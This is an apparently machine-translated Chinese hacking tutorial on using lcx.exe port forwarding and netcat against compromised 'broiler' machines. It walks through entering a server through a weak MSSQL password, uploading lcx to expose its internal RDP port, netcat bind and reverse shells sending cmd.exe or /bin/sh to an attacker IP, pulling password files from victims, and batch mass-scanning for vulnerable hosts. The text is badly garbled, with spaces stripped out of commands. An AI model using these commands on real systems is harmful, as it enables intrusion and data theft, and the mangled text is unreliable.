![]()
如何使用lcx.exe
在捕获肉鸡之前,他们都通过了1433弱密码,然后...
但是,我发现许多服务器打开了1433、3389,但是无法连接终端,因为服务器本身位于内部网络上,并且只有1433端口向外界开放. 在服务器上...
lcx.exe是端口转发工具,等效于将肉鸡A上的端口3389转发到计算机B. 当然,该计算机B必须具有外部网络IP. 这样,链接机器B的3389度端口等效于链接到机器A.3389.
用法: 如果您在本地计算机B上侦听-listen513389,并在肉鸡A上运行-slave local ip51肉鸡ip3389,则可以在本地将127.0.0.1连接到3389的肉鸡. 第二个是局部转向.
示例: 现在有一个1433弱点,其IP为201.1.1.1. 使用端口扫描仅发现端口1433已打开. 用sqltools链接,目录看C: \> DIRC: \
2004/09/1710: 32
2005/02/2117: 0812,541avgun.log. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
日语,显示不正常. 哈哈.
netstat-视图打开端口TCP0.0.0.0: 33760.0.0.0: 0LISTENING
TCP0.0.0.0: 33890.0.0.0: 0收听
TCP0.0.0.0: 37910.0.0.0: 0收听
TCP0.0.0.0: 38770.0.0.0: 0收听
终端打开. 看一下IP
ipconfig
C: \> ipconfig
Windows2000IPConfigurationEthernetadapter
特定于连接的DNS后缀:
IP地址............: 192.168.1.24
SubnetMask ........: 255.255.255.0
DefaultGateway .........: 192.168.1.1192是Intranet ...
现在您可以使用lcx.exe ...
将lcx.exe上载到肉鸡... C: \> dirlcx.exeC: \ WINNT \ system32
2006/04/0213: 4032,768lcx.exe首先在您自己的计算机的cmd下运行
lcx.exe-listen513389
显示如下[+] Listeningport51 ......
[+] ListenOK!
[+] Listeningport3389 ......
[+] ListenOK!
[+] WaitingforClientonport: 51 ...然后在肉鸡上运行lcx.exe-slave您的IP51201.1.1.13389
201.1.1.1是我用作示例的肉鸡IP. 更改为您的. 运行后,机器将在侦听端口上接收信息. [+] Listeningport51 ......
[+] ListenOK!
[+] Listeningport3389 ......
[+] ListenOK!
[+] WaitingforClientonport: 51 ......
[+] AcceptaClientonport55from201.1.1.1 ......
[+]正在等待另一个客户端上的端口: 3389 ....好的. 现在,在您自己的计算机上链接127.0.0.1或丢失您自己的IP.
我发现那不是我自己的机器(或者我什至无法连接到我的机器)ip入侵工具,而是肉鸡A!好处是,我把肉鸡放在了网上.
缺点,有点麻烦,每次必须通过sqltools转发端口时. 当然,您也可以使用反弹木马来控制肉鸡...
如何使用nc.exe
1.Netcat1.10forNT-nc11nt.zip,原始英文信息
2.Netcat1.10forNT帮助信息

3.Netcat1.10常用命令格式
4. 管理肉鸡,更改肉鸡设置
5. 下载连接
############################################# #####################
1.Netcat1.10forNT-nc11nt.zip
############################################# #####################
基本功能
*出站或入站连接,TCP或UDP,或来自任何端口的
* FullDNS转发/反向检查,带有适当的警告
*能够使用任何本地源端口
*能够使用任何本地配置的网络源地址
*内置入口扫描功能,具有随机化功能
*可以从标准输入b读取命令线性参数
*慢速发送模式,每隔一秒Nline
*传输和接收的数据的十六进制转储
*建立其他程序服务的能力
连接
* Telnet-optionsresponder
NewforNT
*无需控制台即可在后台运行的功能
*能够将单线程服务器重新启动到新版本
连接
________________________________________________________________________
一些网络催化功能:
出站或入站连接,TCP或UDP,从任何端口发送或发送
完整的DNS转发/反向检查,带有适当的警告
使用任何本地源端口的能力
使用任何本地配置的网络源地址的能力
内置导入扫描功能,具有随机化功能
内置的源路由功能
可以从标准输入中读取命令线性参数
慢速发送模式,每N秒一线
可选功能以删除另一个程序服务入站连接
一些潜在的网猫用途:
脚本后端
扫描端口和库存服务
备份处理程序
文件传输
服务器测试和模拟
防火墙测试
代理网关
网络性能测试
地址欺骗测试

ProtectingXservers
1001可能会与您一起使用
Netcat +加密=加密猫
比较win2000 Microsoft的telnet.exe和Microsoft的tlntsvr.exe服务,可以在连接时看到它.
1.1NC.EXE是一个非标准的telnet客户端程序,
1.2还有一个putty.exe客户端程序提供了四种连接模式
-raw-telnet-rlogin-ssh.
############################################# #####################
2.Netcat1.10forNT帮助信息
############################################# #####################
C: \ WINDOWS \桌面> nc-h
[v1.10NT]
connecttosomewhere: nc [-选项]主机名端口[s] [端口] ...
listenforinbound: nc-l-pport [选项] [主机名] [端口]
选项:
-d从控制台分离,背景模式(背景模式)
-eproginboundprogramtoexec [危险!!]
-ggatewaysource-routinghoppoint [s]ip入侵工具,最多8
-Gnumsource-routingpointer: 4,8,12,...
-hthiscruft(此帮助信息)
-isecsdelayintervalforlinessent,已扫描端口(延迟时间)
-llistenmode,用于入站连接(侦听模式,等待连接)
-Llistenharder,重新listenonsocketclose(关闭连接后,继续收听)
-仅用于数字的IP地址,noDNS(ip数字模式,非DNS分辨率)
-ofilehexdumpoftraffic(十六进制输出文件,三段)
-pportlocalportnumber(本地端口)
-rrandomizelocalandremoteports(随机的本地远程端口)
-saddrlocalsourceaddress(本地源地址)
-tanswerTELNET协商
-uUDPmode
-vverbose [usetwicetobemoreverbose](-vv更多信息)
-wsecstimeoutforconnects和finalnetreads
-zzero-I / Omode [用于扫描](扫描模式,-vv)
端口号可以设置单个范围: m-n(含)
############################################# #####################
3.Netcat1.10常用命令格式
############################################# #####################
以下引自文章“ 10月15日凌晨睡觉”.
3.1. 端口:
nc-vvipport
RIVER [192.168.0.198] 19190(?)打开//显示是否打开
3.2. 扫描器
nc-vv-w5ipport-portport

nc-vv-zipport-portport
此扫描将留下很多痕迹,系统管理员会格外小心
3.3. 后门
victimmachine: //受害者计算机
nc-l-pport-ecmd.exe // win2000
nc-l-pport-e / bin / sh // Unix,Linux
attackermachine: //攻击者机器.
ncip-pport //连接受害者IP,并获得一个外壳.
3.4. 反向连接
attackermachine: //通常是sql2.exe,远程溢出,webdavx3.exe攻击.
//或Wolf的反向连接.
nc-vv-l-pport
victimmachine:
nc-ecmd.exeattackerip-pport
nc-e / bin / shattackerip-pport
或者:
攻击机:
nc-vv-l-pport1 / /输入* /
nc-vv-l-pprot2 / *用于显示* /
victimmachine:
ncattacker_ipport1 | cmd.exe | ncattacker_ipport2
ncattacker_ipport1 | / bin / sh | ncattacker_ipport2
139添加参数-s(nc.exe-L-p139-d-ecmd.exe-对方的计算机IP)
这将确保nc.exe的优先级高于NETBIOS.
3.5. 传输文件:
3.5.1attackermachine <-victimmachine //从肉鸡拖动密码文件.
nc-d-l-pportpath \ file.txt / *受害机器* /需要Ctrl + C退出
//肉鸡需要在GUI界面上的cmd.exe中执行. 否则无法进入
Crl + C.
3.5.2attackermachine->受害机器//将命令文件上传到肉鸡
nc-vv-l-pport>路径\ file.txt / *受害机器* /需要Ctrl + C才能返回
出
nc-dvictim_ipport <路径\ filedest / *攻击者机器* /可以由外壳执行
//这样比较好. 我们登录到终端. 入侵其他肉鸡. 您可以选择shell模式登录.
结论: 可以传输Ascii和bin文件. 程序文件可以传输.
问题: 连接IP之后,传输完成后,您需要发送Ctrl + C退出nc.exe.
或者仅再次连接并使用pskill.exe杀死该进程. 但是,您是否释放了传输文件打开的句柄?
3.6端口数据包捕获.
nc-vv-w2-otest.txt
<000000583530302053796e746178206572726f72#500语法
r
<000000682c20636f6d6d616e6420222220756e72#,命令“” un
r

<0000007865636f676e697a65642e0d0a#已识别...
<00000084830000018f#.....
3.7telnet,自动批处理. ★★★★★这是我最推荐的东西.
ncvictim_ipport <路径\ file.cmd / *受害机器* /显示执行过程.
nc-vvvictim_ipport <路径\ file.cmd / *受害者机器* /显示执行过程.
nc-dvictim_ipporta.cmd
@echos >> a.cmd
@ echocd / d %% windir %% \ system32 \ >> a.cmd
@netstop“ sksockserver” >> a.cmd
@ snake.exe-configport11111 >> a.cmd
@netstart“ sksockserver” >> a.cmd
@exit >> a.cmd
: 自动
@ for / f“ eol =;令牌= 1,2” %% iin(%1)做@(nc.exe-vv-w3 %% i1234> 80.txt
gotostart
关闭防火墙并运行此批处理过程后,您将听到很多有关检测U漏洞的信息
一组由三种Nimda病毒扫描的病毒. 这将得到肉鸡. 虽然质量不高.
但这也是一种便宜的方法.
肉鸡的特征:
1. unicode漏洞
2. 访客密码为空,管理员组用户
3. 其他漏洞
慢慢走. 但是,再次建议不要这样做,因为它在上升之后不会损坏家庭主机.
重命名tftp.exe. 然后使用pskill杀死mmc.exe进程,再执行杀毒. 后门制成后,
St帐户被禁止处理傻瓜扫描器
############################################# #####################
5. 下载连接
############################################# #####################
5.1
工具: 适用于Unix的Netcat1.10
版本: 96年3月20日
平台: * nix
工具: Netcat1.1forWin95 / 98 / NT / 2000
版本: 98.08.98
平台: RunsonWin95 / 98 / NT / 2000
5.2
名称: cryptcat_nt.zip更新: 2002-04-05
类别: 网络工具平台: Win9x / NT / 2000大小: 115.8K上传: maxilaw
简介: nc加密传输.
5.3外国网站
10.03.0215: 481305cryptcat.txt
10.03.0215: 48245760cryptcat_linux2.tar
10.03.0215: 48118533cryptcat_nt.zip
如何使用sc.exe
MicrosoftWindows [版本5.2.3790]
本文来自电脑杂谈,转载请注明本文网址:
http://www.pc-fly.com/a/ruanjian/article-164949-1.html
重要的事说三遍
好可惜哦